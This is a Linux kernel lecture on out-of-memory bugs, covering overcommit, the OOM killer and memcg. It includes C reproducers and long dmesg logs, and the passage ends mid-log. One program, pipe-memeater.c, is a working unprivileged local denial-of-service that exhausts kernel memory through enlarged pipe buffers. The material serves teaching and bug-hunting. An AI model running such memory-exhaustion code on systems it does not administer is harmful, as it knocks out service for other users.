The memory management subsystem in the Linux kernel is very optimistic. Therefore, unless resources are appropriately restricted using the memory cgroup, it is easy to render a Linux system inoperable by depleting system memory via an out-of-memory local DoS attack. This is also a factor that disturbs the stable operation of Linux systems, causing symptoms such as unexplained hangups, because such an attack can be formed by chance, without any intention to attack.
In this lecture, you will learn how to hunt for bugs caused by memory depletion, look back on my mortal combat with the Linux kernel's memory management subsystem (which started from a vulnerability I found by chance, and is still ongoing), and think about what we should do given the reality that we cannot eradicate bugs caused by memory depletion.
Many sample programs which mount out-of-memory local DoS attacks are introduced. Never execute these programs on machines you do not administer.
Even in attack-and-defense CTF competitions, you might be disqualified for "actions which put excessive stress" if you execute these programs.
I'm not an expert on the memory management subsystem. Nor have I diligently studied books about the Linux kernel. In this lecture, I explain things which I learned from my own experience and which are not explained in technical books.
The reproducer programs are written for the environment below. You may use virtual environments such as VMware Player.
CPUs | 4 (x86_64 architecture) |
RAM | 1024MB or 2048MB (not a NUMA system) |
Swap partitions | none |
Hard disk | a disk recognized as /dev/sda (reproduction might fail if it is not recognized as a SCSI device) |
CD-ROM | a drive recognized as /dev/sr0 (reproduction might fail if it is not recognized as a SCSI device) |
Mount tree | only the / partition, from /dev/sda1 formatted as ext4 or xfs |
Please understand that results will differ due to variable factors such as kernel version, system configuration, and execution timing.
From April 2003 till March 2012, I was involved in the development of an access control module named TOMOYO Linux. While we cannot eradicate bugs such as buffer overflow and/or OS command injection vulnerabilities, the only access control module available when the TOMOYO project started was SELinux, which was too cryptic to use.
Regarding war stories of mainlining TOMOYO Linux, please see the lecture text for Security & Programming Camp 2011 (written in Japanese).
Regarding the history from TOMOYO Linux to AKARI and CaitSith, please see the lecture text for Security Camp 2012.
If you are interested in protection against OS command injection vulnerabilities (e.g. ShellShock), please see the lecture text for Security Camp 2015 (written in Japanese).
From April 2012 till March 2015, I was involved in responding to inquiries about (mainly) RHEL 4 / RHEL 5 / RHEL 6 systems at a support center. Since I had experienced Linux kernel programming through the development of TOMOYO Linux (though, due to the nature of access control modules, only in areas close to userspace), I handled inquiries about problems for which steps for reproducing and/or examining them were not yet established, and which therefore required identifying what was happening (by writing programs for examination).
It was common to get support requests for examining the cause of unexpected hangups or reboots. But we seldom succeeded in identifying the cause of a hangup, because there was no clue message in /var/log/messages .
I proposed enabling serial consoles and/or netconsole, expecting that "although we cannot expect messages during a hangup to be recorded to log files, the kernel might have printed something during the hangup", but we did not get any messages as far as I remember. It was a frustrating situation, as if encountering unsolvable challenges one after another in Capture The Flag (CTF) games.
You can trace the discussions since November 2014 (mainly) in the archives of the linux-mm mailing list.
In userspace, memory allocation requests seldom fail. We can ask for more memory than the system has using malloc() etc., because memory overcommitting is permitted by default.
---------- overcommit.c ----------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
	unsigned long size = 0;
	char *buf = NULL;
	while (1) {
		char *cp = realloc(buf, size + 1048576);
		if (!cp)
			break;
		buf = cp;
		size += 1048576;
	}
	printf("Allocated %lu MB\n", size / 1048576);
	free(buf);
	printf("Freed %lu MB\n", size / 1048576);
	return 0;
}
---------- overcommit.c ----------
---------- Example output start ----------
[kumaneko@localhost ~]$ cat /proc/meminfo
MemTotal: 1914588 kB
MemFree: 1758600 kB
Buffers: 9044 kB
Cached: 55324 kB
SwapCached: 0 kB
Active: 38408 kB
Inactive: 42832 kB
Active(anon): 17112 kB
Inactive(anon): 4 kB
Active(file): 21296 kB
Inactive(file): 42828 kB
Unevictable: 0 kB
Mlocked: 0 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 64 kB
Writeback: 0 kB
AnonPages: 16888 kB
Mapped: 12552 kB
Shmem: 228 kB
Slab: 36644 kB
SReclaimable: 10984 kB
SUnreclaim: 25660 kB
KernelStack: 3760 kB
PageTables: 2892 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 957292 kB
Committed_AS: 92500 kB
VmallocTotal: 34359738367 kB
VmallocUsed: 149588 kB
VmallocChunk: 34359581684 kB
HardwareCorrupted: 0 kB
AnonHugePages: 2048 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
DirectMap4k: 6144 kB
DirectMap2M: 1042432 kB
DirectMap1G: 1048576 kB
[kumaneko@localhost ~]$ ./overcommit
Allocated 100663295 MB
Freed 100663295 MB
[kumaneko@localhost ~]$
---------- Example output end ----------
Thanks to memory overcommitting, we can run many processes.
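For comparison, overcommitting can also be turned off via the documented sysctl /proc/sys/vm/overcommit_memory (mode 0 is the default heuristic, mode 2 means "never overcommit"). Below is a minimal sketch, run as root, that switches to mode 2; after that, allocation requests beyond the CommitLimit shown in /proc/meminfo start failing, so overcommit.c stops far earlier instead of successfully reserving roughly 96TB of virtual address space as in the example output above.
---------- no-overcommit.c (illustrative sketch) ----------
#include <stdio.h>

int main(void)
{
	/* Mode 2 = never overcommit; mode 0 (the default) = heuristic. */
	FILE *fp = fopen("/proc/sys/vm/overcommit_memory", "w");
	if (!fp)
		return 1;
	fprintf(fp, "2\n");
	fclose(fp);
	return 0;
}
---------- no-overcommit.c (illustrative sketch) ----------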
The OOM killer is a mechanism which tries to keep the Linux system alive by resolving an out-of-memory (OOM) situation when one occurs.
It reclaims memory by forcibly terminating processes with the SIGKILL signal.
It assumes that memory can always be reclaimed, because the SIGKILL signal cannot be ignored.
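That premise can be confirmed from userspace: the kernel refuses to let any process ignore or catch SIGKILL. A minimal sketch (signal() fails with EINVAL):
---------- sigkill-check.c (illustrative sketch) ----------
#include <stdio.h>
#include <signal.h>
#include <errno.h>
#include <string.h>

int main(void)
{
	/* Trying to ignore SIGKILL always fails. */
	if (signal(SIGKILL, SIG_IGN) == SIG_ERR)
		printf("signal(SIGKILL, SIG_IGN) failed: %s\n",
		       strerror(errno));
	return 0;
}
---------- sigkill-check.c (illustrative sketch) ----------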
Risk level 0: We have enough room. If there is plenty of free memory, we don't need to reclaim memory.
Risk level 1: We are close to problems. When free memory drops below the low: watermark, the kswapd process asynchronously reclaims memory until free memory recovers to the high: watermark. If asynchronous reclaim by kswapd is not sufficient, the allocating process performs synchronous reclaim (direct reclaim) itself.
Risk level 2: An OOM situation has occurred. If free memory drops below the min: watermark and nobody can reclaim memory any more, the system is in an OOM situation. If invoking the OOM killer is allowed, the OOM killer reclaims memory by terminating processes with the SIGKILL signal.
Risk level 3: The game is over. If free memory reaches 0, the system will hang up in most cases.
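These per-zone watermarks (the min:, low: and high: values that also appear in the OOM killer's zone dumps below) can be observed via /proc/zoneinfo. A minimal sketch, assuming the /proc/zoneinfo layout of the kernels used here (the values are in pages, not kB, and the field layout may vary across kernel versions):
---------- watermarks.c (illustrative sketch) ----------
#include <stdio.h>
#include <string.h>

int main(void)
{
	char line[256];
	FILE *fp = fopen("/proc/zoneinfo", "r");
	if (!fp)
		return 1;
	while (fgets(line, sizeof(line), fp)) {
		/* Zone headers look like "Node 0, zone   DMA32". */
		if (!strncmp(line, "Node", 4) ||
		    strstr(line, " min ") || strstr(line, " low ") ||
		    strstr(line, " high "))
			fputs(line, stdout);
	}
	fclose(fp);
	return 0;
}
---------- watermarks.c (illustrative sketch) ----------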
---------- oom.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
	unsigned long size = 0;
	char *buf = NULL;
	while (1) {
		char *cp = realloc(buf, size + 1048576);
		if (!cp)
			break;
		buf = cp;
		size += 1048576;
	}
	printf("Allocated %lu MB\n", size / 1048576);
	memset(buf, 0, size);
	printf("Filled %lu MB\n", size / 1048576);
	free(buf);
	printf("Freed %lu MB\n", size / 1048576);
	return 0;
}
---------- oom.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ ./oom Allocated 100663295 MB Killed [kumaneko@localhost ~]$ dmesg [ 164.825320] oom invoked oom-killer: gfp_mask=0x280da, order=0, oom_adj=0, oom_score_adj=0 [ 164.826957] oom cpuset=/ mems_allowed=0 [ 164.827789] Pid: 1615, comm: oom Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 164.829140] Call Trace: [ 164.829593] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0 [ 164.830855] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 164.832089] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70 [ 164.833303] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 164.834402] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 164.835512] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 164.836543] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 164.837692] [<ffffffff81170a7a>] ? alloc_pages_vma+0x9a/0x150 [ 164.838743] [<ffffffff81152edd>] ? handle_pte_fault+0x73d/0xb20 [ 164.839886] [<ffffffff810537b7>] ? pte_alloc_one+0x37/0x50 [ 164.841020] [<ffffffff8118c559>] ? do_huge_pmd_anonymous_page+0xb9/0x3b0 [ 164.842306] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0 [ 164.843400] [<ffffffff810663f3>] ? perf_event_task_sched_out+0x33/0x70 [ 164.844603] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500 [ 164.845672] [<ffffffff8153927e>] ? thread_return+0x4e/0x7d0 [ 164.846723] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0 [ 164.847953] [<ffffffff8153cc55>] ? page_fault+0x25/0x30 [ 164.848914] Mem-Info: [ 164.849339] Node 0 DMA per-cpu: [ 164.849937] CPU 0: hi: 0, btch: 1 usd: 0 [ 164.850804] CPU 1: hi: 0, btch: 1 usd: 0 [ 164.851781] CPU 2: hi: 0, btch: 1 usd: 0 [ 164.852670] CPU 3: hi: 0, btch: 1 usd: 0 [ 164.853632] Node 0 DMA32 per-cpu: [ 164.854269] CPU 0: hi: 186, btch: 31 usd: 0 [ 164.855133] CPU 1: hi: 186, btch: 31 usd: 0 [ 164.856152] CPU 2: hi: 186, btch: 31 usd: 0 [ 164.857041] CPU 3: hi: 186, btch: 31 usd: 0 [ 164.858033] active_anon:446933 inactive_anon:1 isolated_anon:0 [ 164.858034] active_file:0 inactive_file:14 isolated_file:0 [ 164.858034] unevictable:0 dirty:1 writeback:0 unstable:0 [ 164.858034] free:13259 slab_reclaimable:1902 slab_unreclaimable:6401 [ 164.858035] mapped:9 shmem:57 pagetables:1732 bounce:0 [ 164.863169] Node 0 DMA free:8336kB min:332kB low:412kB high:496kB active_anon:7332kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:40kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 164.870125] lowmem_reserve[]: 0 2004 2004 2004 [ 164.871060] Node 0 DMA32 free:44700kB min:44720kB low:55900kB high:67080kB active_anon:1780400kB inactive_anon:4kB active_file:0kB inactive_file:56kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:4kB writeback:0kB mapped:36kB shmem:228kB slab_reclaimable:7608kB slab_unreclaimable:25604kB kernel_stack:3776kB pagetables:6888kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:690 all_unreclaimable? 
yes [ 164.878996] lowmem_reserve[]: 0 0 0 0 [ 164.879969] Node 0 DMA: 2*4kB 1*8kB 4*16kB 2*32kB 2*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 1*4096kB = 8336kB [ 164.882265] Node 0 DMA32: 496*4kB 137*8kB 45*16kB 26*32kB 38*64kB 11*128kB 2*256kB 8*512kB 13*1024kB 5*2048kB 2*4096kB = 44824kB [ 164.884786] 99 total pagecache pages [ 164.885462] 0 pages in swap cache [ 164.886100] Swap cache stats: add 0, delete 0, find 0/0 [ 164.887027] Free swap = 0kB [ 164.887677] Total swap = 0kB [ 164.890966] 524272 pages RAM [ 164.891554] 45689 pages reserved [ 164.892198] 460 pages shared [ 164.892760] 459990 pages non-shared [ 164.893400] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 164.894783] [ 485] 0 485 2672 118 3 -17 -1000 udevd [ 164.896319] [ 1139] 0 1139 2280 123 2 0 0 dhclient [ 164.897721] [ 1195] 0 1195 6899 60 2 -17 -1000 auditd [ 164.899068] [ 1217] 0 1217 62272 649 0 0 0 rsyslogd [ 164.900463] [ 1246] 81 1246 5388 107 1 0 0 dbus-daemon [ 164.901944] [ 1259] 0 1259 20705 222 0 0 0 NetworkManager [ 164.903465] [ 1263] 0 1263 14530 124 3 0 0 modem-manager [ 164.905125] [ 1298] 68 1298 9588 292 3 0 0 hald [ 164.906547] [ 1299] 0 1299 5099 54 3 0 0 hald-runner [ 164.908127] [ 1337] 0 1337 5627 47 1 0 0 hald-addon-rfki [ 164.909747] [ 1345] 0 1345 5629 47 0 0 0 hald-addon-inpu [ 164.911254] [ 1346] 0 1346 11247 133 2 0 0 wpa_supplicant [ 164.912993] [ 1351] 68 1351 4501 41 2 0 0 hald-addon-acpi [ 164.914570] [ 1372] 0 1372 16558 177 0 -17 -1000 sshd [ 164.915955] [ 1451] 0 1451 20222 226 2 0 0 master [ 164.917391] [ 1463] 89 1463 20242 217 0 0 0 pickup [ 164.918860] [ 1464] 89 1464 20259 218 1 0 0 qmgr [ 164.920391] [ 1465] 0 1465 29216 152 2 0 0 crond [ 164.921769] [ 1479] 0 1479 17403 127 3 0 0 login [ 164.923171] [ 1480] 0 1480 1020 23 0 0 0 agetty [ 164.924621] [ 1482] 0 1482 1016 21 3 0 0 mingetty [ 164.926043] [ 1484] 0 1484 1016 21 3 0 0 mingetty [ 164.927490] [ 1486] 0 1486 1016 22 3 0 0 mingetty [ 164.928890] [ 1488] 0 1488 1016 20 3 0 0 mingetty [ 164.930313] [ 1490] 0 1490 1016 22 2 0 0 mingetty [ 164.931718] [ 1495] 0 1495 2671 117 1 -17 -1000 udevd [ 164.933090] [ 1496] 0 1496 2671 117 3 -17 -1000 udevd [ 164.934490] [ 1498] 0 1498 521256 370 1 0 0 console-kit-dae [ 164.935999] [ 1565] 0 1565 27075 101 1 0 0 bash [ 164.937387] [ 1580] 0 1580 25629 254 0 0 0 sshd [ 164.938787] [ 1582] 500 1582 25629 252 0 0 0 sshd [ 164.940167] [ 1583] 500 1583 27076 97 0 0 0 bash [ 164.941506] [ 1615] 500 1615 25769820886 442651 2 0 0 oom [ 164.942905] Out of memory: Kill process 1615 (oom) score 926 or sacrifice child [ 164.944495] Killed process 1615, UID 500, (oom) total-vm:103079283544kB, anon-rss:1770600kB, file-rss:4kB [kumaneko@localhost ~]$ ---------- Example output end ----------
It looks like the OOM killer is functional, doesn't it?
Linux provides the cgroup functionality for restricting resource usage, and the memory cgroup (one of the cgroup controllers) can restrict memory usage based on the group a process belongs to. But if the memory cgroup is not appropriately configured, a system-wide OOM situation will occur after all.
In this lecture, I basically assume only system-wide OOM situations.
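As an illustration, here is a minimal sketch of restricting userspace memory with the cgroup v1 memory controller. The mount point /sys/fs/cgroup/memory (RHEL 6 mounted it at /cgroup/memory instead) and the group name "sandbox" are assumptions; memory.limit_in_bytes and tasks are the standard v1 interface files.
---------- memcg-limit.c (illustrative sketch) ----------
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
	FILE *fp;
	/* Create a group (the name "sandbox" is hypothetical). */
	mkdir("/sys/fs/cgroup/memory/sandbox", 0755);
	/* Limit userspace memory of this group to 256MB. */
	fp = fopen("/sys/fs/cgroup/memory/sandbox/memory.limit_in_bytes", "w");
	if (!fp)
		return 1;
	fprintf(fp, "%lu\n", 256UL * 1048576);
	fclose(fp);
	/* Move the current process (e.g. a login shell) into the group. */
	fp = fopen("/sys/fs/cgroup/memory/sandbox/tasks", "w");
	if (!fp)
		return 1;
	fprintf(fp, "%u\n", (unsigned int) getpid());
	fclose(fp);
	return 0;
}
---------- memcg-limit.c (illustrative sketch) ----------
Note that memory.limit_in_bytes counts userspace pages; kernel memory such as pipe buffers is not covered unless kmemcg (explained later) is also configured.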
If I stopped here, this would be nothing but a user's guide. In this lecture, I explain the contradictions inside the memory management subsystem.
One day in July 2013, I noticed a strange patch while running "git bisect" to debug some problem in the development kernel.
[35f3d14dbbc58447c61e38a162ea10add6b31dc7] pipe: add support for shrinking and growing pipes
··· I checked the relevant patches, and it turned out that an unprivileged user can grow a pipe's buffer size from 64KB to 1MB.
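This can be observed from an unprivileged shell. A minimal sketch (F_GETPIPE_SZ is the companion fcntl command, numbered 1024 + 8 in the same series as the F_SETPIPE_SZ used by the reproducer below; 1MB is the default /proc/sys/fs/pipe-max-size limit for unprivileged users):
---------- pipesize.c (illustrative sketch) ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ (1024 + 7)
#endif
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ (1024 + 8)
#endif

int main(void)
{
	int fd[2];
	if (pipe(fd))
		return 1;
	/* Default capacity is 64KB (= 65536) on these kernels. */
	printf("before: %d bytes\n", fcntl(fd[0], F_GETPIPE_SZ));
	/* An unprivileged user may grow it up to 1MB. */
	if (fcntl(fd[1], F_SETPIPE_SZ, 1048576) == -1)
		return 1;
	printf("after: %d bytes\n", fcntl(fd[0], F_GETPIPE_SZ));
	return 0;
}
---------- pipesize.c (illustrative sketch) ----------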
---------- pipe-memeater.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define F_SETPIPE_SZ (1024 + 7)

static void child(void)
{
	int fd[2];
	while (pipe(fd) != EOF &&
	       fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) {
		int i;
		for (i = 0; i < 256; i++) {
			static char buf[4096];
			if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
				printf("write error\n");
				_exit(1);
			}
		}
		close(fd[0]);
	}
	pause();
	_exit(0);
}

int main(int argc, char *argv[])
{
	int i;
	close(0);
	for (i = 2; i < 1024; i++)
		close(i);
	for (i = 0; i < 10; i++)
		if (fork() == 0)
			child();
	return 0;
}
---------- pipe-memeater.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ pstree -pA init(1)-+-NetworkManager(1206) |-agetty(1430) |-auditd(1142)---{auditd}(1143) |-bonobo-activati(1630)---{bonobo-activat}(1631) |-console-kit-dae(1440)-+-{console-kit-da}(1441) | |-{console-kit-da}(1442) | |-{console-kit-da}(1443) | |-{console-kit-da}(1444) | |-{console-kit-da}(1445) | |-{console-kit-da}(1446) | |-{console-kit-da}(1447) | |-{console-kit-da}(1448) | |-{console-kit-da}(1449) | |-{console-kit-da}(1450) | |-{console-kit-da}(1451) | |-{console-kit-da}(1452) | |-{console-kit-da}(1453) | |-{console-kit-da}(1454) | |-{console-kit-da}(1455) | |-{console-kit-da}(1456) | |-{console-kit-da}(1457) | |-{console-kit-da}(1458) | |-{console-kit-da}(1459) | |-{console-kit-da}(1460) | |-{console-kit-da}(1461) | |-{console-kit-da}(1462) | |-{console-kit-da}(1463) | |-{console-kit-da}(1464) | |-{console-kit-da}(1465) | |-{console-kit-da}(1466) | |-{console-kit-da}(1467) | |-{console-kit-da}(1468) | |-{console-kit-da}(1469) | |-{console-kit-da}(1470) | |-{console-kit-da}(1471) | |-{console-kit-da}(1472) | |-{console-kit-da}(1473) | |-{console-kit-da}(1474) | |-{console-kit-da}(1475) | |-{console-kit-da}(1476) | |-{console-kit-da}(1477) | |-{console-kit-da}(1478) | |-{console-kit-da}(1479) | |-{console-kit-da}(1480) | |-{console-kit-da}(1481) | |-{console-kit-da}(1482) | |-{console-kit-da}(1483) | |-{console-kit-da}(1484) | |-{console-kit-da}(1485) | |-{console-kit-da}(1486) | |-{console-kit-da}(1487) | |-{console-kit-da}(1488) | |-{console-kit-da}(1489) | |-{console-kit-da}(1490) | |-{console-kit-da}(1491) | |-{console-kit-da}(1492) | |-{console-kit-da}(1493) | |-{console-kit-da}(1494) | |-{console-kit-da}(1495) | |-{console-kit-da}(1496) | |-{console-kit-da}(1497) | |-{console-kit-da}(1498) | |-{console-kit-da}(1499) | |-{console-kit-da}(1500) | |-{console-kit-da}(1501) | |-{console-kit-da}(1502) | `-{console-kit-da}(1504) |-crond(1408) |-dbus-daemon(1601) |-dbus-daemon(1193) |-dbus-launch(1600) |-devkit-power-da(1605) |-dhclient(1086) |-gconfd-2(1609) |-gdm-binary(1567)-+-gdm-simple-slav(1580)-+-Xorg(1583) | | |-gdm-session-wor(1661) | | |-gnome-session(1602)-+-at-spi-registry(1625) | | | |-gdm-simple-gree(1641)---{gdm-simple-gre}(1652) | | | |-gnome-power-man(1642) | | | |-metacity(1638) | | | |-polkit-gnome-au(1640) | | | `-{gnome-session}(1626) | | `-{gdm-simple-sla}(1584) | `-{gdm-binary}(1581) |-gnome-settings-(1628)---{gnome-settings}(1633) |-gvfsd(1637) |-hald(1245)-+-hald-runner(1246)-+-hald-addon-acpi(1295) | | |-hald-addon-inpu(1293) | | `-hald-addon-rfki(1285) | `-{hald}(1247) |-login(1424)---bash(1507) |-master(1396)-+-pickup(1411) | `-qmgr(1413) |-mingetty(1426) |-mingetty(1428) |-mingetty(1431) |-mingetty(1433) |-mingetty(1435) |-modem-manager(1211) |-notification-da(1651) |-polkitd(1645) |-pulseaudio(1654)---{pulseaudio}(1660) |-rsyslogd(1164)-+-{rsyslogd}(1165) | |-{rsyslogd}(1166) | `-{rsyslogd}(1167) |-rtkit-daemon(1656)-+-{rtkit-daemon}(1657) | `-{rtkit-daemon}(1658) |-sshd(1317)---sshd(1664)---sshd(1666)---bash(1667)---pstree(1684) |-udevd(423)-+-udevd(1437) | `-udevd(1438) `-wpa_supplicant(1282) [kumaneko@localhost ~]$ ./pipe-memeater (Omitting re-login operation) [kumaneko@localhost ~]$ dmesg [ 100.086247] pipe-memeater invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0 [ 100.087747] pipe-memeater cpuset=/ mems_allowed=0 [ 100.088693] Pid: 1687, comm: pipe-memeater Not tainted 2.6.35.14 #1 [ 100.089949] Call Trace: [ 100.090640] [<ffffffff810ac9e1>] ? 
cpuset_print_task_mems_allowed+0x91/0xa0 [ 100.092080] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0 [ 100.093106] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120 [ 100.094226] [<ffffffff810f9021>] oom_kill_process+0x81/0x180 [ 100.095432] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0 [ 100.096745] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0 [ 100.097796] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0 [ 100.098990] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100 [ 100.100181] [<ffffffff8114de87>] pipe_write+0x387/0x670 [ 100.101200] [<ffffffff8114504a>] do_sync_write+0xda/0x120 [ 100.102284] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230 [ 100.103319] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230 [ 100.104381] [<ffffffff811cb556>] ? security_file_permission+0x16/0x20 [ 100.105659] [<ffffffff81145328>] vfs_write+0xb8/0x1a0 [ 100.106684] [<ffffffff810ba932>] ? audit_syscall_entry+0x252/0x280 [ 100.108022] [<ffffffff81145cd1>] sys_write+0x51/0x90 [ 100.109007] [<ffffffff8100aff2>] system_call_fastpath+0x16/0x1b [ 100.110197] Mem-Info: [ 100.110644] Node 0 DMA per-cpu: [ 100.111327] CPU 0: hi: 0, btch: 1 usd: 0 [ 100.112277] CPU 1: hi: 0, btch: 1 usd: 0 [ 100.113140] CPU 2: hi: 0, btch: 1 usd: 0 [ 100.114110] CPU 3: hi: 0, btch: 1 usd: 0 [ 100.114971] Node 0 DMA32 per-cpu: [ 100.115658] CPU 0: hi: 186, btch: 31 usd: 0 [ 100.116654] CPU 1: hi: 186, btch: 31 usd: 32 [ 100.117595] CPU 2: hi: 186, btch: 31 usd: 0 [ 100.118537] CPU 3: hi: 186, btch: 31 usd: 0 [ 100.119483] active_anon:11091 inactive_anon:3641 isolated_anon:0 [ 100.119484] active_file:21 inactive_file:24 isolated_file:0 [ 100.119485] unevictable:0 dirty:21 writeback:0 unstable:0 [ 100.119485] free:3422 slab_reclaimable:4462 slab_unreclaimable:22253 [ 100.119485] mapped:276 shmem:305 pagetables:1864 bounce:0 [ 100.125138] Node 0 DMA free:8024kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:100kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 100.132211] lowmem_reserve[]: 0 2004 2004 2004 [ 100.133220] Node 0 DMA32 free:5664kB min:5708kB low:7132kB high:8560kB active_anon:44108kB inactive_anon:14820kB active_file:84kB inactive_file:96kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:84kB writeback:0kB mapped:1104kB shmem:1220kB slab_reclaimable:17848kB slab_unreclaimable:88912kB kernel_stack:2008kB pagetables:7456kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:1412 all_unreclaimable? 
yes [ 100.141024] lowmem_reserve[]: 0 0 0 0 [ 100.141879] Node 0 DMA: 1*4kB 2*8kB 0*16kB 2*32kB 2*64kB 1*128kB 2*256kB 2*512kB 2*1024kB 2*2048kB 0*4096kB = 8020kB [ 100.144271] Node 0 DMA32: 676*4kB 7*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 0*512kB 1*1024kB 1*2048kB 0*4096kB = 6024kB [ 100.146722] 346 total pagecache pages [ 100.147435] 0 pages in swap cache [ 100.148090] Swap cache stats: add 0, delete 0, find 0/0 [ 100.149096] Free swap = 0kB [ 100.149671] Total swap = 0kB [ 100.152844] 524272 pages RAM [ 100.153432] 13239 pages reserved [ 100.154126] 1067 pages shared [ 100.154695] 488972 pages non-shared [ 100.155379] [ pid ] uid tgid total_vm rss cpu oom_adj name [ 100.156582] [ 1] 0 1 4851 75 1 0 init [ 100.157793] [ 423] 0 423 2767 200 0 -17 udevd [ 100.158985] [ 1086] 0 1086 2292 122 1 0 dhclient [ 100.160335] [ 1142] 0 1142 6399 49 1 -17 auditd [ 100.161553] [ 1164] 0 1164 60746 96 1 0 rsyslogd [ 100.162787] [ 1193] 81 1193 5471 159 3 0 dbus-daemon [ 100.164070] [ 1206] 0 1206 20717 219 0 0 NetworkManager [ 100.165406] [ 1211] 0 1211 14542 123 1 0 modem-manager [ 100.166709] [ 1245] 68 1245 9089 296 0 0 hald [ 100.167855] [ 1246] 0 1246 5111 56 3 0 hald-runner [ 100.169135] [ 1282] 0 1282 11259 132 3 0 wpa_supplicant [ 100.170476] [ 1285] 0 1285 5639 42 1 0 hald-addon-rfki [ 100.171936] [ 1293] 0 1293 5641 42 0 0 hald-addon-inpu [ 100.173260] [ 1295] 68 1295 4513 40 3 0 hald-addon-acpi [ 100.174622] [ 1317] 0 1317 16570 177 0 -17 sshd [ 100.175790] [ 1396] 0 1396 20234 218 0 0 master [ 100.177024] [ 1408] 0 1408 29216 152 2 0 crond [ 100.178188] [ 1411] 89 1411 20254 217 1 0 pickup [ 100.179389] [ 1413] 89 1413 20271 216 1 0 qmgr [ 100.180571] [ 1424] 0 1424 17415 123 3 0 login [ 100.181737] [ 1426] 0 1426 1028 21 2 0 mingetty [ 100.182983] [ 1428] 0 1428 1028 21 3 0 mingetty [ 100.184222] [ 1430] 0 1430 1032 21 0 0 agetty [ 100.185481] [ 1431] 0 1431 1028 21 1 0 mingetty [ 100.187031] [ 1433] 0 1433 1028 20 1 0 mingetty [ 100.188345] [ 1435] 0 1435 1028 21 2 0 mingetty [ 100.189638] [ 1437] 0 1437 2683 116 3 -17 udevd [ 100.190865] [ 1438] 0 1438 2683 116 2 -17 udevd [ 100.192152] [ 1440] 0 1440 520756 243 3 0 console-kit-dae [ 100.193565] [ 1507] 0 1507 27088 95 1 0 bash [ 100.194796] [ 1567] 0 1567 33001 79 1 0 gdm-binary [ 100.196134] [ 1580] 0 1580 40656 150 3 0 gdm-simple-slav [ 100.197543] [ 1583] 0 1583 42848 4384 2 0 Xorg [ 100.198911] [ 1600] 42 1600 5021 55 1 0 dbus-launch [ 100.200288] [ 1601] 42 1601 5402 79 3 0 dbus-daemon [ 100.201579] [ 1602] 42 1602 66762 476 3 0 gnome-session [ 100.202944] [ 1605] 0 1605 12502 161 3 0 devkit-power-da [ 100.204322] [ 1609] 42 1609 33068 538 0 0 gconfd-2 [ 100.205580] [ 1625] 42 1625 30187 283 0 0 at-spi-registry [ 100.206961] [ 1628] 42 1628 86331 943 0 0 gnome-settings- [ 100.208318] [ 1630] 42 1630 88624 186 1 0 bonobo-activati [ 100.210025] [ 1637] 42 1637 33831 76 2 0 gvfsd [ 100.211269] [ 1638] 42 1638 71465 679 0 0 metacity [ 100.212521] [ 1640] 42 1640 62088 437 3 0 polkit-gnome-au [ 100.213886] [ 1641] 42 1641 94596 1210 2 0 gdm-simple-gree [ 100.215265] [ 1642] 42 1642 68437 516 2 0 gnome-power-man [ 100.216677] [ 1645] 0 1645 13169 304 1 0 polkitd [ 100.217893] [ 1654] 42 1654 85934 194 1 0 pulseaudio [ 